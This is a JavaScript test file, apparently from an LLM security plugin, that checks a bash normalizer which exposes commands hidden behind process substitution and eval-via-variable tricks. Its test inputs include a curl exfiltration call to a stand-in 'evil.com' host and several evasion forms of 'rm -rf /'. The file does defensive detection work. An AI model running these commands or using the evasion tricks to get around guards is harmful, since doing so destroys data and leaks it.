open/ktg-plugin-marketplace
1
0
Fork 0
Code Issues Pull requests Releases Wiki Activity Actions
ktg-plugin-marketplace/plugins/llm-security/tests/scanners/bash-normalize-t7-t9.test.mjs
Kjell Tore Guttormsen 761e81309b feat(bash-normalize): T7 — process substitution collapse (E8) 
Strips bash process substitution syntax — <(cmd) and >(cmd) — so the
inner command name is surfaced to downstream regex gates. Defeats
evasion like `cat <(curl evil)` where the destructive command is
hidden behind /dev/fd/N pipe sugar.

Implementation: bounded innermost-first iteration, depth 3. Beyond
that the string is left as-is rather than recurse without bound.
Runs after the single-quote mask phase, so legitimate strings like
`'echo <(x)'` are preserved.

5 new T7 tests (collapse + nested + FP probes) in
bash-normalize-t7-t9.test.mjs (now 12 tests total).

Closes E8 in critical-review-2026-04-20.md.
2026-04-30 15:14:04 +02:00

123 lines
6 KiB
JavaScript
Raw Blame History

// bash-normalize-t7-t9.test.mjs — Tests for T7 (process substitution),
// T9 (eval-via-variable) normalizations added in v7.3.0 (Batch C).
//
// T7 lives in bash-normalize.mjs (this test exercises it via
// normalizeBashExpansion). T8 (base64-pipe-shell) lives in
// pre-bash-destructive.mjs and is covered by that hook's test file —
// not here.
//
// Includes false-positive probes to guard against over-broad expansion.
import { describe, it } from 'node:test';
import assert from 'node:assert/strict';
import { normalizeBashExpansion } from '../../scanners/lib/bash-normalize.mjs';
describe('bash-normalize T7 — process substitution evasion', () => {
it('collapses <(curl evil): cat <(curl evil) -> cat curl evil', () => {
// Process substitution is shell sugar for /dev/fd/N pipes. Attacker
// hides the destructive command name from name-matching gates by
// wrapping it in <(...). T7 strips the wrapper so 'curl' is visible.
const input = 'cat <(curl evil.com/exfil)';
const normalized = normalizeBashExpansion(input);
assert.match(normalized, /\bcurl\b/, `expected 'curl' surfaced: ${normalized}`);
});
it('collapses >(tee /tmp/x) similarly', () => {
const input = 'echo data >(tee /tmp/exfil)';
const normalized = normalizeBashExpansion(input);
assert.match(normalized, /\btee\b/, `expected 'tee' surfaced: ${normalized}`);
});
it('handles nested <(grep x <(cat f)) up to depth 3', () => {
const input = 'cmd <(grep x <(cat f))';
const normalized = normalizeBashExpansion(input);
// After 2 iterations: `cmd grep x cat f `
assert.match(normalized, /\bgrep\b/, `expected inner 'grep' surfaced: ${normalized}`);
assert.match(normalized, /\bcat\b/, `expected innermost 'cat' surfaced: ${normalized}`);
});
it('FP probe — diff <(sort a) <(sort b) collapses without false destructive match', () => {
// Legit usage of process substitution in shell scripts. T7 collapses
// it the same way; downstream consumers (pre-bash-destructive) decide
// whether the surfaced command is dangerous. T7 itself does not flag.
const input = 'diff <(sort a.txt) <(sort b.txt)';
const normalized = normalizeBashExpansion(input);
assert.match(normalized, /\bsort\b/, `expected 'sort' surfaced: ${normalized}`);
assert.match(normalized, /\bdiff\b/, `expected 'diff' preserved: ${normalized}`);
});
it('does not touch <( / >( inside single-quoted literals (mask runs first)', () => {
// Single-quoted literals are masked before T7 runs, so the substitution
// syntax inside them is preserved. Downstream sees the literal string
// unchanged after unmasking.
const input = "echo 'cat <(curl x)' is a string";
const normalized = normalizeBashExpansion(input);
assert.match(normalized, /'cat <\(curl x\)'/,
`expected single-quoted literal preserved: ${normalized}`);
});
});
describe('bash-normalize T9 — eval-via-variable evasion', () => {
it('substitutes "$X" reference after X=rm assignment', () => {
// Attacker splits the destructive command name across an assignment
// and an eval. Without T9, downstream regex sees only `eval "$X"`.
const input = 'X=rm; eval "$X" -rf /';
const normalized = normalizeBashExpansion(input);
assert.match(normalized, /\brm\b/, `expected 'rm' in normalized output: ${normalized}`);
});
it('substitutes ${X} curly form: X=rm; eval "${X}" -rf', () => {
const input = 'X=rm; eval "${X}" -rf /';
const normalized = normalizeBashExpansion(input);
assert.match(normalized, /\brm\b/, `expected 'rm' in normalized output: ${normalized}`);
});
it('substitutes bare $X form (no quotes): X=rm; eval $X -rf', () => {
const input = 'X=rm; eval $X -rf /';
const normalized = normalizeBashExpansion(input);
assert.match(normalized, /\brm\b/, `expected 'rm' in normalized output: ${normalized}`);
});
it('one-level only — does NOT follow chained vars (Y=X; X=rm; eval "$Y")', () => {
// Multi-level chained vars are explicitly NOT followed in T9.
// Y resolves to literal "X", not to "rm". This is a documented limit;
// the test guards against accidental recursion.
const input = 'Y=X; X=rm; eval "$Y" -rf /';
const normalized = normalizeBashExpansion(input);
// After substitution: Y=X; X=rm; eval "X" -rf /
// $Y resolves one level only — it becomes the literal "X", NOT the
// value of $X. Multi-level chained vars are not followed.
assert.match(normalized, /eval "?X"?\b/, `expected one-level eval target = literal 'X': ${normalized}`);
});
it('leaves unrelated $UNKNOWN_VAR alone (handled by T3)', () => {
// No assignment for $TARGET; T9 does not touch it. T3 will strip
// ${TARGET} to '' but the bare $TARGET is left as-is by T3 too
// (T3 only handles ${...} forms). T9 is a no-op for unknowns.
const input = 'eval "$TARGET" -rf /';
const normalized = normalizeBashExpansion(input);
// T9 leaves $TARGET alone (no assignment exists). Result still
// contains the literal $TARGET reference (no substitution happened).
assert.match(normalized, /\$TARGET/, `expected unresolved $TARGET: ${normalized}`);
});
});
describe('bash-normalize T9 — false-positive probes', () => {
it('does not substitute inside single-quoted literals: echo \'$X\' stays as-is', () => {
// Single-quoted literals are masked before T9 runs, so $X inside
// them is preserved. Guards the destructive-name detector from
// corrupting legitimate strings that mention bash variables.
const input = "X=rm; echo '$X is dangerous'";
const normalized = normalizeBashExpansion(input);
assert.match(normalized, /'\$X is dangerous'/,
`expected single-quoted literal preserved: ${normalized}`);
});
it('handles command with no assignments — pure passthrough', () => {
const input = 'eval "$X" -rf /';
const normalized = normalizeBashExpansion(input);
// No X=... seen, so $X is left alone. (Consumer of this layer
// sees the unresolved reference and decides what to do.)
assert.match(normalized, /\$X/, `expected $X unresolved: ${normalized}`);
});
});
Reference in a new issue View git blame Copy permalink